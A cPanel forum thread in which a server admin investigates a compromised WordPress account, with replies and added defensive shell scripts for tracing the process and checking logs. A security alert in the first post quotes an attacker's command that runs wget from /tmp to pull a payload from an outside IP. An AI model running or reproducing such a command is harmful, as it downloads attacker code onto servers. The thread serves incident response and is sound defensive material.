The Community Forums

Interact with an entire community of cPanel & WHM users!

suspicious process from client website

Discussion in 'Security' started by Hays Sleiman, Oct 25, 2016.

  1. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Hi guys,

    I have WHM and CSF installed and after configuring all settings and so on, there is only one notice I keep getting from CSF that's suspicious however I can't seem to find the culprit file and need some help please.
    Code:
    Time:         Wed Oct 26 02:00:21 2016 +1100
    Account:      c150102a
    Resource:     Process Time
    Exceeded:     3026245 > 1800 (seconds)
    Executable:   /usr/bin/bash
    Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766 1> /dev/null 2> /dev/null && echo OK
    PID:          2261 (Parent PID:2260)
    Killed:       No
    I am particularly worried about the calls to that IP ^ (176.119.x.xx). I tried getting some info on it, and can only find that it's based in Ukraine and some suspicious reports on it but nothing definitive.

    Another thing I'm finding in CSF logs are from the same client account:

    Executable: /usr/bin/php
    Command Line: /usr/bin/php /home/c150102a/public_html/wp-content/themes/main-theme/syslib.php

    I opened the syslib.php file and it was indeed a bad file. I got rid of it but I'm still getting the log in csf. Does this mean something is still trying to run this file?

    I have updated all wordpress files on this specific account (c150102a) and removed all but 3 plugins which I know aren't the cause. I've run some scanners and can't find any bad scripts or any files containing the above commands.

    So my question is, what is my next step apart from removing the account altogether? I'm not sure how to find what is calling that command. Is there any way I can find the culprit?
     
    #1 Hays Sleiman, Oct 25, 2016
    Last edited by a moderator: Oct 25, 2016
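Added example, not part of the original post: a small POSIX shell script that takes an lfd "Process Time" alert like the one above, pulls out the PID/parent PID and the remote URL, and then walks the process ancestry in /proc to show what spawned the wget loop. Two things the alert itself already tells you: "Exceeded: 3026245 > 1800 (seconds)" means the process had been running for roughly 35 days, and "Killed: No" means lfd only reported it, so deleting a file on disk does not stop an already running process. The alert text below is a constructed copy of the one in the post (the IP stays redacted as 176.119.x.xx); the `conns_to` helper needs `ss` from iproute2 and is only useful on the live server.

```shell
#!/bin/sh
# Added example (not from the thread): parse an lfd Process Time alert and
# walk the process tree in /proc.  Needs only POSIX sh, sed, awk and /proc.

# Constructed sample alert, copied from the post with the IP left redacted.
SAMPLE_ALERT='Time:         Wed Oct 26 02:00:21 2016 +1100
Account:      c150102a
Resource:     Process Time
Exceeded:     3026245 > 1800 (seconds)
Executable:   /usr/bin/bash
Command Line: sh -c cd /tmp ; /usr/bin/wget -t0 -c http://176.119.x.xx:82/338/d/sess_3306573f35a450867b3c55f039474766 1> /dev/null 2> /dev/null && echo OK
PID:          2261 (Parent PID:2260)
Killed:       No'

# alert_field NAME -- value of one "Name: value" line of an alert read from stdin
alert_field() {
    sed -n "s/^$1:[[:space:]]*//p"
}

# alert_pids -- "PID PPID" from the "PID: 2261 (Parent PID:2260)" line
alert_pids() {
    sed -n 's/^PID:[[:space:]]*\([0-9]*\) (Parent PID:\([0-9]*\)).*/\1 \2/p'
}

# alert_urls -- every http(s) URL in the command line, one per line (the IOC)
alert_urls() {
    alert_field "Command Line" | grep -oE 'https?://[^[:space:]]+'
}

# alert_age_days -- how long the process had been running, from "Exceeded: N > M (seconds)"
alert_age_days() {
    secs=$(sed -n 's/^Exceeded:[[:space:]]*\([0-9]*\) >.*/\1/p')
    echo $((secs / 86400))
}

# proc_ancestry PID -- follow PPid links from PID up to pid 1, printing
#   pid uid exe cwd cmdline
# for each ancestor.  A script that was deleted while still running shows up
# as "(deleted)" on the exe or cwd link, which is the case to look for when a
# file was removed but the alerts keep coming.
proc_ancestry() {
    pid=$1
    while [ "$pid" -gt 0 ] && [ -r "/proc/$pid/status" ]; do
        uid=$(awk '/^Uid:/ {print $2}' "/proc/$pid/status")
        exe=$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')
        cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')
        cmd=$(tr '\0' ' ' < "/proc/$pid/cmdline" 2>/dev/null)
        printf '%s %s %s %s %s\n' "$pid" "$uid" "$exe" "$cwd" "$cmd"
        [ "$pid" -eq 1 ] && break
        pid=$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")
    done
}

# conns_to HOST -- live TCP sockets to the IOC host, with owning process.
# wget -t0 retries forever, so on the real box the connection (or the
# connection attempt) shows up here; needs ss from iproute2, run as root.
conns_to() {
    ss -tnp 2>/dev/null | grep -F "$1" || true
}

# Usage against the sample; on the real server feed it the live alert and use
# the PID it reports (here $$ stands in, so the script runs anywhere).
printf '%s\n' "$SAMPLE_ALERT" | alert_pids
printf '%s\n' "$SAMPLE_ALERT" | alert_urls
printf '%s\n' "$SAMPLE_ALERT" | alert_age_days
proc_ancestry $$
```

Once the ancestor is found, kill that process (not just the wget, which the parent restarts), then inspect its cwd and exe; a PHP process whose exe is `/usr/bin/php` and whose cwd is under the account's `public_html` points straight at the web shell that started it.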
  2. SysSachin

    SysSachin Well-Known Member

    Joined:
    Aug 23, 2015
    Messages:
    542
    Likes Received:
    39
    Trophy Points:
    28
    Location:
    India
    cPanel Access Level:
    Root Administrator
    As per the above alert, your user c150102a was running a command through SSH. You can remove that account from your server; also please check the /tmp directory and remove all unwanted files.
    If you are not sure about that then please contact your system admin.
     
    #2 SysSachin, Oct 26, 2016
    Last edited by a moderator: Oct 26, 2016
  3. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I am the system admin. I run the WHM server myself to host client websites.

    I'm sorry but I do not believe removing the c150102a account is a solution. The account hosts a website for a customer of mine and I cannot simply remove it.

    I would like to learn how to properly diagnose which file is running the command so I can resolve the issue and know how to deal with it in case I run in to something like this again.
     
  4. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    15,618
    Likes Received:
    296
    Trophy Points:
    433
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    You might want to google that filename, syslib.php for starters.
     
  5. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Well I found the syslib.php file and removed it. I also did a search for any eval(base64_decode(...)) scripts but didn't find any.

    However, I am still receiving the CSF alerts for something calling a command to that Ukraine IP.

    Any other suggestions?
     
  6. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    15,618
    Likes Received:
    296
    Trophy Points:
    433
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Have you checked the account for existing cron jobs?
    Cron Jobs - Documentation - cPanel Documentation

    That account shouldn't have access to SSH. It's been compromised and should be removed from the server and a backup from before this came up restored in its place. Without more knowledge of the server and your security, it's hard to say if the entire server has been compromised or not.

    You really should hire someone for assistance with this if you're unsure of your path forward here. This thread is two days old. Your server's been running a compromised site for at least two days too long.
     
  7. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    I double checked. There are no existing cron jobs for any of the users.

    And this site has been live for months, yet there are no performance issues and nothing else suspicious going on. No other accounts are reporting any bad activities or scripts. In fact, CSF does not report anything else at all apart from that one alert over and over.

    I have run numerous scanners on the account itself, internally and externally, and several WordPress plugin scanners, and none of them have picked up on anything at all.

    If all else fails and I can't find the culprit, I will remove the account and rebuild the site. However, I am still keen to know what could be causing this...
     
  8. Hays Sleiman

    Hays Sleiman Member

    Joined:
    Jan 19, 2016
    Messages:
    11
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Australia
    cPanel Access Level:
    Root Administrator
    Hi guys, so I went through all the accounts I had (47 in total) and found only 3 accounts with Shell access. None of these accounts were the same as the one mentioned above that was giving warnings.

    However, after fixing this and removing Shell access for these 3 accounts and restarting the server, the warnings have stopped. Not sure what stopped it or what was causing it still, but everything seems fine now and no more security alerts.

    Also a system wide scan was clean, so I believe the server is fine and there are no more threats or compromised sites.
     
  9. NixTree

    NixTree Well-Known Member

    Joined:
    Aug 19, 2010
    Messages:
    404
    Likes Received:
    2
    Trophy Points:
    143
    Location:
    Gods Own Country
    cPanel Access Level:
    Root Administrator
    Hi

    Are you sure you have mounted /tmp and /dev/shm as noexec and nosuid? If not, please do it ASAP and remount both partitions.

    Surely the account mentioned is up to some sort of hack and you need to introspect the account in a detailed manner. Did you check and scan the account in question? Also look for the recently modified files for that account, say the last 90 days, and see if you get any clue. Also check the POST requests in the access logs and see if you see any suspicious entries.
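Added example, not part of the original post: the three checks in the reply above (mount options on /tmp and /dev/shm, recently modified PHP files, POST requests in the access log) as POSIX shell functions. The sample /proc/mounts and the Apache combined-format access-log lines are constructed here so the script runs offline; on a cPanel server you would point them at /proc/mounts, the account's home directory, and the account's access log (the path /home/<user>/access-logs/<domain> is an assumption).

```shell
#!/bin/sh
# Added example (not from the thread): the checks a compromised cPanel account
# should get first.  POSIX sh plus awk, find and sort.

# tmp_hardened MOUNTS_FILE MOUNTPOINT -- exit 0 if MOUNTPOINT is a separate
# mount carrying both noexec and nosuid, 1 otherwise.  "Not a separate mount"
# also counts as a failure: it then inherits the permissive options of /.
tmp_hardened() {
    awk -v mp="$2" '
        $2 == mp {
            found = 1
            n = split($4, o, ",")
            for (i = 1; i <= n; i++) seen[o[i]] = 1
            exit
        }
        END { exit !(found && seen["noexec"] && seen["nosuid"]) }
    ' "$1"
}

# php_posts ACCESS_LOG -- "count ip path" for POST requests to PHP files,
# skipping the endpoints WordPress itself POSTs to all day.  What is left,
# particularly anything under wp-content/ (themes, plugins, uploads), is a
# candidate web shell being driven from outside.
php_posts() {
    awk '
        $6 == "\"POST" && $7 ~ /\.php/ &&
        $7 !~ /wp-login\.php|admin-ajax\.php|wp-cron\.php|xmlrpc\.php/ {
            split($7, u, "?")          # drop the query string
            c[$1 " " u[1]]++
        }
        END { for (k in c) print c[k], k }
    ' "$1" | sort -rn
}

# recent_php DIR DAYS -- PHP files under DIR modified in the last DAYS days
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2"
}

# ---- constructed inputs so the script runs without a real server ----------
WORK=$(mktemp -d)
MOUNTS="$WORK/mounts"
LOG="$WORK/access_log"
cat > "$MOUNTS" <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
EOF
cat > "$LOG" <<'EOF'
203.0.113.5 - - [25/Oct/2016:13:41:02 +1100] "POST /wp-content/themes/main-theme/syslib.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Oct/2016:13:41:09 +1100] "POST /wp-content/themes/main-theme/syslib.php?x=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Oct/2016:13:42:30 +1100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Oct/2016:13:43:11 +1100] "POST /wp-content/uploads/2016/10/x.php HTTP/1.1" 200 40 "-" "curl/7.47"
203.0.113.5 - - [25/Oct/2016:13:44:50 +1100] "GET /wp-content/themes/main-theme/syslib.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Oct/2016:13:45:01 +1100] "POST /wp-content/themes/main-theme/syslib.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
EOF
mkdir -p "$WORK/public_html/wp-content/themes/main-theme"
: > "$WORK/public_html/wp-content/themes/main-theme/syslib.php"

# Usage: on the real box replace $MOUNTS with /proc/mounts, $LOG with the
# account's access log and $WORK with /home/<user>.
for mp in /tmp /dev/shm; do
    if tmp_hardened "$MOUNTS" "$mp"; then echo "$mp: noexec,nosuid"; else echo "$mp: NOT hardened"; fi
done
php_posts "$LOG"
recent_php "$WORK" 90
```

The access-log check is the one that answers "is something still trying to run this file": repeated POSTs to the same odd PHP path from one or two IPs, after the file was removed, are the attacker's controller polling its shell, and the first POST to that path in the log gives you the date the compromise started and a second IP to block in CSF.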
     